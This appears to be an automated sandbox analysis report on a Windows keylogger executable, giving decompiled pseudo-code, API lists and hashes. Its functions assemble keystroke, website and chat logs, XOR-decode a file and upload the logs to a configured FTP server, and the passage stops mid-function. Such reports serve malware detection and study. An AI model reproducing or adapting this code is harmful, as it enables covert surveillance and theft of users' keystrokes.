    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #537
    • String ID: E-mail$Explore$Open$Print$User defined
    • API String ID: 4256512136-311612163
    • Opcode ID: 68c20a54a95c0b657dc1114f85bc6d1867cf2b277db078f8276378c23660a588
    • Instruction ID: 73cf33b5ddf5fa1b7dce1ba4b4089a695e8bcbe9cbfc87a3bc914db13a9e42e7
    • Opcode Fuzzy Hash: 68c20a54a95c0b657dc1114f85bc6d1867cf2b277db078f8276378c23660a588
    • Instruction Fuzzy Hash: 0AE03000E08E809B8714BE65E4376692E11CAD9B87754A15FFD411F1D38E4C491C422D
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 122 403e41-403e43 123 403e45-403e4d 122->123 124 403e69-403eb4 #537 * 5 122->124
    C-Code - Quality: 46%
    			E00403E41(signed int __eax, void* __ebx, signed int __ecx) {
    
    				if(__ebx == 0) {
    					_push("User defined");
    					L0043DE26();
    					_push("Open");
    					L0043DE26();
    					_push("Print");
    					L0043DE26();
    					_push("Explore");
    					L0043DE26();
    					_push("E-mail");
    					L0043DE26();
    					return __eax;
    				} else {
    					asm("aad 0xa9");
    					return (__eax | __ecx) +  *(__eax | __ecx); // executed
    				}
    			}

    APIs
    • #537.MFC42(User defined), ref: 00403E73
    • #537.MFC42(Open,User defined), ref: 00403E82
    • #537.MFC42(Print,Open,User defined), ref: 00403E91
    • #537.MFC42(Explore,Print,Open,User defined), ref: 00403EA0
    • #537.MFC42(E-mail,Explore,Print,Open,User defined), ref: 00403EAF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #537
    • String ID: E-mail$Explore$Open$Print$User defined
    • API String ID: 4256512136-311612163
    • Opcode ID: 77a1ef7df0a1a2299b9292e6f674efe3d1e6e0db80eae300491140485ebbe17c
    • Instruction ID: 6baa1e6d6a725d20f4853b6735982a7f3838682df7a0f979331674cfab6a53ae
    • Opcode Fuzzy Hash: 77a1ef7df0a1a2299b9292e6f674efe3d1e6e0db80eae300491140485ebbe17c
    • Instruction Fuzzy Hash: 88E08C01F44E80974628BE61A43367D2E01CBE8BC7764A25FBD021E1E38E9C0A1C422D
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 134 41ff1d-41ff74 call 43e4e0 call 42a660 #924 call 428dcb #800 141 41ff76-41ff93 #924 MoveFileA #800 134->141 142 41ff98-41ffa6 134->142 141->142
    C-Code - Quality: 65%
    			E0041FF1D(void* __eflags) {
    				int _t17;
    				CHAR** _t18;
    				char* _t28;
    				void* _t33;
    
    				E0043E4E0(0x441e3c, _t33);
    				E0042A660(_t33 - 0x118, 1, 0);
    				_t28 = "rinst.exe";
    				_t16 = _t33 - 0x14;
    				_push(_t28);
    				_push(0x4558c8);
    				_push(_t33 - 0x14);
    				L0043DE20();
    				 *(_t33 - 4) =  *(_t33 - 4) & 0x00000000;
    				_t17 = E00428DCB( *_t16); // executed
    				 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
    				L0043DD36();
    				if(_t17 != 0) {
    					_push(_t28);
    					_t18 = _t33 - 0x10;
    					_push(0x4558c8);
    					_push(_t18);
    					L0043DE20();
    					_t17 = MoveFileA( *_t18, _t33 - 0x118);
    					L0043DD36();
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t33 - 0xc));
    				return _t17;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0041FF22
      • Part of subcall function 0042A660: GetModuleFileNameA.KERNEL32(00000000,?,00000103,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A66F
      • Part of subcall function 0042A660: lstrlenA.KERNEL32(?,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A67C
      • Part of subcall function 0042A660: lstrlenA.KERNEL32(?,00000000,?,00419205,?,00000005,00000000), ref: 0042A68B
      • Part of subcall function 0042A660: lstrcatA.KERNEL32(?,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A6A0
    • #924.MFC42(?,004558C8,rinst.exe), ref: 0041FF53
      • Part of subcall function 00428DCB: memset.MSVCRT ref: 00428DE2
      • Part of subcall function 00428DCB: FindFirstFileA.KERNELBASE(?,?), ref: 00428DF4
    • #800.MFC42(?,004558C8,rinst.exe), ref: 0041FF6D
    • #924.MFC42(?,004558C8,rinst.exe,?,004558C8,rinst.exe), ref: 0041FF7C
    • MoveFileA.KERNEL32 ref: 0041FF8A
    • #800.MFC42 ref: 0041FF93
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: File$#800#924lstrlen$FindFirstH_prologModuleMoveNamelstrcatmemset
    • String ID: rinst.exe
    • API String ID: 1090809799-2036006234
    • Opcode ID: 82e2414bda17109ac939241e3222086aab483a7774587a2c4f9c52cdf50d2b86
    • Instruction ID: f3093b62ff86694fb6e3fccf50743f3fd4b5af4d8b9a602e62b7de5d7cd47f71
    • Opcode Fuzzy Hash: 82e2414bda17109ac939241e3222086aab483a7774587a2c4f9c52cdf50d2b86
    • Instruction Fuzzy Hash: D2019E32D00118AACB24EBE2E84AFDF7B78EB59314F00056EB515A7081DB384A08CA64
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph (figure; nodes: 40bbe2-40bc06 CreateFileA, 40bc08-40bc17 GetFileSize, 40bc1c-40bc2d ReadFile, 40bc2f CloseHandle, 40bc39-40bc49 CloseHandle; executed and not-executed blocks are colour-coded in the original figure)
    C-Code - Quality: 75%
    			E0040BBE2(void* __ecx, long _a4) {
    				void* _t4;
    				int _t8;
    				void* _t10;
    				void* _t16;
    				void* _t17;
    				void* _t18;
    
    				_t18 = __ecx; // executed
    				_t4 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
    				_t17 = _t4;
    				if(_t17 == 0xffffffff) {
    					L5:
    					return 0;
    				}
    				if(GetFileSize(_t17, 0) == 0x1070) {
    					_t8 = ReadFile(_t17, _t18, 0x1070,  &_a4, 0);
    					_push(_t17);
    					if(_t8 != 0) {
    						CloseHandle();
    						_t16 = _t18 + 0x1070;
    						_t10 = _t18;
    						if(_t18 >= _t16) {
    							L8:
    							return 1;
    						} else {
    							goto L7;
    						}
    						do {
    							L7:
    							 *_t10 =  *_t10 ^ 0x000000aa;
    							_t10 = _t10 + 1;
    						} while (_t10 < _t16);
    						goto L8;
    					}
    					L4:
    					CloseHandle();
    					goto L5;
    				}
    				_push(_t17);
    				goto L4;
    			}

    APIs
    • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040BBFB
    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040BC0A
    • ReadFile.KERNEL32(00000000,?,00001070,?,00000000), ref: 0040BC24
    • CloseHandle.KERNEL32(00000000,?,00001070,?,00000000), ref: 0040BC2F
    • CloseHandle.KERNEL32(00000000,?,00001070,?,00000000), ref: 0040BC39
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: File$CloseHandle$CreateReadSize
    • String ID:
    • API String ID: 3664964396-0
    • Opcode ID: 570956207296f7c4ab01858c5de894a7153637b9e2fe62243e54270b13043310
    • Instruction ID: a71d09fd1a0274597eb4b1fe31ad0f5805eb20cf226668bf68a77ac8ba911590
    • Opcode Fuzzy Hash: 570956207296f7c4ab01858c5de894a7153637b9e2fe62243e54270b13043310
    • Instruction Fuzzy Hash: 6F01F735104108BEF7241B649C88FB73A6CD7A37A5B10063EF612E62D0DB745C8282BC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 28%
    			E0043EBEA(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
    
    				_t1 =  &_a16; // 0x43e8e2
    				_push( *_t1);
    				_push(_a12);
    				_push(_a8);
    				_push(_a4);
    				L0043EC48(); // executed
    				return __eax;
    			}

    APIs
    • #1576.MFC42(?,?,?,C,0043E8E2,00000000,?,0000000A), ref: 0043EBFA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #1576
    • String ID: C
    • API String ID: 1976119259-2515487769
    • Opcode ID: 98812f7e98be52a91f64d10adafef66e323b9058a040c87af58a0a1629adb3d9
    • Instruction ID: 49c87f1e772037b25e41f68cdd361f47a4e1822e88400bebf4c8f5ac9de8b9f4
    • Opcode Fuzzy Hash: 98812f7e98be52a91f64d10adafef66e323b9058a040c87af58a0a1629adb3d9
    • Instruction Fuzzy Hash: 33B00836019386ABDB06EE91880196EBAA2BB98314F586C1DB2A1000A587668428AB16
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041AFA6(intOrPtr _a4, CHAR* _a8) {
    				char _v68;
    				int _t8;
    				void* _t10;
    				void* _t11;
    				CHAR* _t12;
    
    				E0041AD0E(_t11, _a4, "_r <()<1-Z2[l5,^",  &_v68);
    				_t12 = _a8;
    				_t8 = lstrcmpiA( &_v68, _t12); // executed
    				if(_t8 != 0 ||  *_t12 == _t8) {
    					return 0;
    				} else {
    					_t10 = 1;
    					return _t10;
    				}
    			}

    APIs
      • Part of subcall function 0041AD0E: lstrlenA.KERNEL32(?), ref: 0041AD1E
      • Part of subcall function 0041AD0E: lstrlenA.KERNEL32(?), ref: 0041AD28
    • lstrcmpiA.KERNEL32(?,?), ref: 0041AFC9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: lstrlen$lstrcmpi
    • String ID: _r <()<1-Z2[l5,^
    • API String ID: 1808961391-4178176214
    • Opcode ID: 8951ff7e72835721d766f7c8ad831a30e587c82331da3f3e94c9c864e4d86370
    • Instruction ID: b492154342c7a6bd4aa1abe367ad41c9b814a400d9aebbfd25be3698167cd68d
    • Opcode Fuzzy Hash: 8951ff7e72835721d766f7c8ad831a30e587c82331da3f3e94c9c864e4d86370
    • Instruction Fuzzy Hash: 27E0DFB1501218BADB20AF61AC0ABEF3B6C9B00350B040427FC01D6241E664E9A7969A
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: __dllonexit_onexit
    • String ID:
    • API String ID: 2384194067-0
    • Opcode ID: 930135da46e59631227af801569e5384dbd8e9b48d65ea7726111ac70d8eb099
    • Instruction ID: 1dbce99dce1505e9b5210be75a9b5fbfe5f35aa4d9610a846aba862af67eb4b7
    • Opcode Fuzzy Hash: 930135da46e59631227af801569e5384dbd8e9b48d65ea7726111ac70d8eb099
    • Instruction Fuzzy Hash: 72C02270004B00BECE023711BD026693710AB90733F30822AF520000F387390615BE89
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    C-Code - Quality: 71%
    			E004258FF(void* __edx) {
    				void* __esi;
    				void* _t420;
    				void* _t428;
    				int _t431;
    				CHAR* _t432;
    				CHAR* _t433;
    				char* _t434;
    				signed int _t435;
    				signed int _t441;
    				void* _t445;
    				int _t450;
    				int _t458;
    				void* _t459;
    				int _t466;
    				void* _t467;
    				void* _t468;
    				void* _t469;
    				char** _t477;
    				CHAR** _t483;
    				void* _t487;
    				CHAR** _t488;
    				CHAR** _t495;
    				CHAR* _t498;
    				void* _t499;
    				void* _t500;
    				CHAR** _t501;
    				CHAR* _t503;
    				void* _t504;
    				void* _t505;
    				CHAR** _t506;
    				char* _t512;
    				char* _t513;
    				char* _t514;
    				int _t516;
    				int _t519;
    				void* _t528;
    				char* _t530;
    				signed int _t532;
    				CHAR* _t533;
    				void* _t534;
    				void* _t535;
    				CHAR** _t536;
    				CHAR* _t538;
    				signed int _t542;
    				char* _t543;
    				signed int _t545;
    				char* _t546;
    				signed int _t548;
    				char* _t549;
    				signed int _t554;
    				signed int _t555;
    				signed int _t556;
    				signed int _t557;
    				signed int _t558;
    				signed int _t559;
    				signed int _t565;
    				signed int _t577;
    				void* _t585;
    				void* _t661;
    				void* _t666;
    				char* _t669;
    				signed int _t672;
    				void* _t676;
    				void* _t678;
    				void* _t679;
    
    				_t659 = __edx;
    				E0043E4E0(0x442b26, _t676);
    				_t679 = _t678 - 0x5c4;
    				 *(_t676 - 0x44) =  *(_t676 - 0x44) & 0x00000000;
    				_push(_t676 - 0x2c);
    				L0043E162();
    				_t661 =  *(_t676 + 8);
    				if( *(_t661 + 0x369) != 0) {
    					_push("bpk.dat");
    					_push(0x4558c4);
    					_push(_t676 - 0x1c);
    					L0043DE20();
    					 *(_t676 - 4) =  *(_t676 - 4) & 0x00000000;
    					_push("web.dat");
    					_push(0x4558c4);
    					_push(_t676 - 0x24);
    					L0043DE20();
    					_push("bpkch.dat");
    					_push(0x4558c4);
    					_push(_t676 - 0x20);
    					 *(_t676 - 4) = 1;
    					L0043DE20();
    					_push("keystrokes.html");
    					_push(0x4558c8);
    					_push(_t676 - 0x50);
    					 *(_t676 - 4) = 2;
    					L0043DE20();
    					_push("websites.html");
    					_push(0x4558c8);
    					_push(_t676 - 0x54);
    					 *(_t676 - 4) = 3;
    					L0043DE20();
    					_push("chats.html");
    					_push(0x4558c8);
    					_push(_t676 - 0x58);
    					 *(_t676 - 4) = 4;
    					L0043DE20();
    					__eflags =  *((char*)(_t661 + 0x140));
    					 *(_t676 - 4) = 5;
    					if( *((char*)(_t661 + 0x140)) != 0) {
    						_push(0);
    						_push( *(_t676 - 0x50));
    						_push( *(_t676 - 0x1c));
    						_t557 = E0042A486(__edx);
    						_t679 = _t679 + 0xc;
    						__eflags = _t557;
    						if(_t557 != 0) {
    							_push(_t676 - 0x50);
    							L0043DFCA();
    						}
    						__eflags =  *((char*)(_t661 + 0x140));
    						if( *((char*)(_t661 + 0x140)) != 0) {
    							_push(1);
    							_push( *(_t676 - 0x54));
    							_push( *(_t676 - 0x24));
    							_t558 = E0042A486(_t659);
    							_t679 = _t679 + 0xc;
    							__eflags = _t558;
    							if(_t558 != 0) {
    								_push(_t676 - 0x54);
    								L0043DFCA();
    							}
    							__eflags =  *((char*)(_t661 + 0x140));
    							if( *((char*)(_t661 + 0x140)) != 0) {
    								_push(2);
    								_push( *(_t676 - 0x58));
    								_push( *(_t676 - 0x20));
    								_t559 = E0042A486(_t659);
    								_t679 = _t679 + 0xc;
    								__eflags = _t559;
    								if(_t559 != 0) {
    									_push(_t676 - 0x58);
    									L0043DFCA();
    								}
    							}
    						}
    					}
    					_t565 = 0;
    					 *(_t676 + 8) = 0;
    					E0042835B(_t676 - 0x84, 0, 1);
    					 *(_t676 - 0x88) =  *(_t676 - 0x88) & 0;
    					__eflags =  *(_t661 + 0x362);
    					 *(_t676 - 4) = 6;
    					if( *(_t661 + 0x362) != 0) {
    						_t556 = _t676 - 0x2b4;
    						_push(_t556);
    						_push( *(_t676 - 0x1c));
    						L0043E294();
    						__eflags = _t556;
    						if(_t556 != 0) {
    							_t565 =  *(_t676 - 0x2a8);
    							 *(_t676 + 8) = _t565;
    						}
    					}
    					__eflags =  *((char*)(_t661 + 0x364));
    					if( *((char*)(_t661 + 0x364)) != 0) {
    						_t555 = _t676 - 0x2b4;
    						_push(_t555);
    						_push( *(_t676 - 0x24));
    						L0043E294();
    						__eflags = _t555;
    						if(_t555 != 0) {
    							_t565 = _t565 +  *(_t676 - 0x2a8);
    							__eflags = _t565;
    							 *(_t676 + 8) = _t565;
    						}
    					}
    					__eflags =  *((char*)(_t661 + 0x363));
    					if( *((char*)(_t661 + 0x363)) != 0) {
    						_t554 = _t676 - 0x2b4;
    						_push(_t554);
    						_push( *(_t676 - 0x20));
    						L0043E294();
    						__eflags = _t554;
    						if(_t554 != 0) {
    							_t565 = _t565 +  *(_t676 - 0x2a8);
    							__eflags = _t565;
    							 *(_t676 + 8) = _t565;
    						}
    					}
    					__eflags =  *((char*)(_t661 + 0x365));
    					if( *((char*)(_t661 + 0x365)) != 0) {
    						_push(_t676 - 0x88);
    						_push(_t676 - 0x84);
    						_push(_t661);
    						E004255B0(_t659);
    						_t679 = _t679 + 0xc;
    						_t565 = _t565 +  *(_t676 - 0x88);
    						__eflags = _t565;
    						 *(_t676 + 8) = _t565;
    					}
    					__eflags = _t565;
    					if(_t565 != 0) {
    						L0043DDD8();
    						__eflags =  *((char*)(_t661 + 0x14f));
    						 *(_t676 - 4) = 7;
    						if( *((char*)(_t661 + 0x14f)) == 0) {
    							L45:
    							__eflags =  *((char*)(_t661 + 0x366));
    							if( *((char*)(_t661 + 0x366)) == 0) {
    								L53:
    								lstrcpyA(_t676 - 0x19c, _t661 + 0x569);
    								__eflags =  *(_t676 - 0x19c);
    								if( *(_t676 - 0x19c) == 0) {
    									lstrcpyA(_t676 - 0x19c, "/");
    								}
    								_t420 = InternetOpenA("PK", 0, 0, 0, 0);
    								__eflags = _t420;
    								 *(_t676 - 0x28) = _t420;
    								_push(0);
    								if(_t420 != 0) {
    									asm("sbb eax, eax");
    									_t428 = InternetConnectA( *(_t676 - 0x28), _t661 + 0x369,  *(_t661 + 0x106c), _t661 + 0x469, _t661 + 0x4e9, 1,  ~( *(_t661 + 0x368)) & 0x08000000, ??);
    									__eflags = _t428;
    									 *(_t676 + 8) = _t428;
    									if(_t428 != 0) {
    										__eflags =  *(_t676 - 0x19c);
    										if( *(_t676 - 0x19c) == 0) {
    											L63:
    											 *(_t676 - 0x70) = 0x7f;
    											_t431 = GetComputerNameA(_t676 - 0x3b4, _t676 - 0x70);
    											_push(0);
    											L0043E288();
    											_t432 =  *_t431;
    											_push(0);
    											 *(_t676 - 0x14) = _t432;
    											L0043E288();
    											_t433 = _t432[4];
    											_push(0);
    											 *(_t676 - 0x3c) = _t433;
    											L0043E288();
    											_t434 = _t433[8];
    											_push(0);
    											 *(_t676 - 0x40) = _t434;
    											L0043E288();
    											_t435 = _t434[0xc];
    											_push(0);
    											 *(_t676 - 0x34) = _t435;
    											L0043E288();
    											_push(0);
    											_t585 = _t676 - 0x2c;
    											L0043E288();
    											sprintf(_t676 - 0x4b8, "%02d-%02d-%02d-%02d-%02d-%02d",  *((intOrPtr*)(_t435 + 0x14)) + 0x76c,  *((intOrPtr*)(_t435 + 0x10)) + 1,  *(_t676 - 0x34),  *(_t676 - 0x40),  *(_t676 - 0x3c),  *(_t676 - 0x14));
    											_t441 = FtpCreateDirectoryA( *(_t676 + 8), _t676 - 0x4b8);
    											__eflags = _t441;
    											if(_t441 == 0) {
    												L68:
    												InternetCloseHandle( *(_t676 + 8));
    												_push( *(_t676 - 0x28));
    												L51:
    												DeleteFileA();
    												L52:
    												_t666 = 0;
    												 *0x4558e8 = 0;
    												goto L115;
    											}
    											__eflags =  *(_t676 - 0x19c);
    											if( *(_t676 - 0x19c) != 0) {
    												_t516 = lstrlenA(_t676 - 0x19c);
    												__eflags =  *((char*)(_t676 + _t516 - 0x19d)) - 0x2f;
    												if( *((char*)(_t676 + _t516 - 0x19d)) != 0x2f) {
    													lstrcatA(_t676 - 0x19c, "/");
    												}
    											}
    											lstrcatA(_t676 - 0x19c, _t676 - 0x4b8);
    											_t450 = FtpSetCurrentDirectoryA( *(_t676 + 8), _t676 - 0x19c);
    											__eflags = _t450;
    											if(_t450 != 0) {
    												__eflags =  *((char*)(_t661 + 0x14f));
    												if( *((char*)(_t661 + 0x14f)) == 0) {
    													__eflags =  *(_t661 + 0x362);
    													if( *(_t661 + 0x362) != 0) {
    														_t450 = E00428DCB( *(_t676 - 0x1c));
    														__eflags = _t450;
    														_pop(_t585);
    														if(_t450 != 0) {
    															__eflags =  *((char*)(_t661 + 0x140));
    															_t514 = "keystrokes.html";
    															if( *((char*)(_t661 + 0x140)) == 0) {
    																_t514 = "bpk.dat";
    															}
    															_t450 = FtpPutFileA( *(_t676 + 8),  *(_t676 - 0x1c), _t514, 2, 0);
    														}
    													}
    												}
    												__eflags =  *((char*)(_t661 + 0x14f));
    												if( *((char*)(_t661 + 0x14f)) != 0) {
    													L88:
    													_t450 = FtpPutFileA( *(_t676 + 8),  *(_t676 - 0x38), "Logs.zip", 2, 0);
    													goto L89;
    												} else {
    													__eflags =  *((char*)(_t661 + 0x364));
    													if( *((char*)(_t661 + 0x364)) != 0) {
    														_t450 = E00428DCB( *(_t676 - 0x24));
    														__eflags = _t450;
    														_pop(_t585);
    														if(_t450 != 0) {
    															__eflags =  *((char*)(_t661 + 0x140));
    															_t513 = "websites.html";
    															if( *((char*)(_t661 + 0x140)) == 0) {
    																_t513 = "web.dat";
    															}
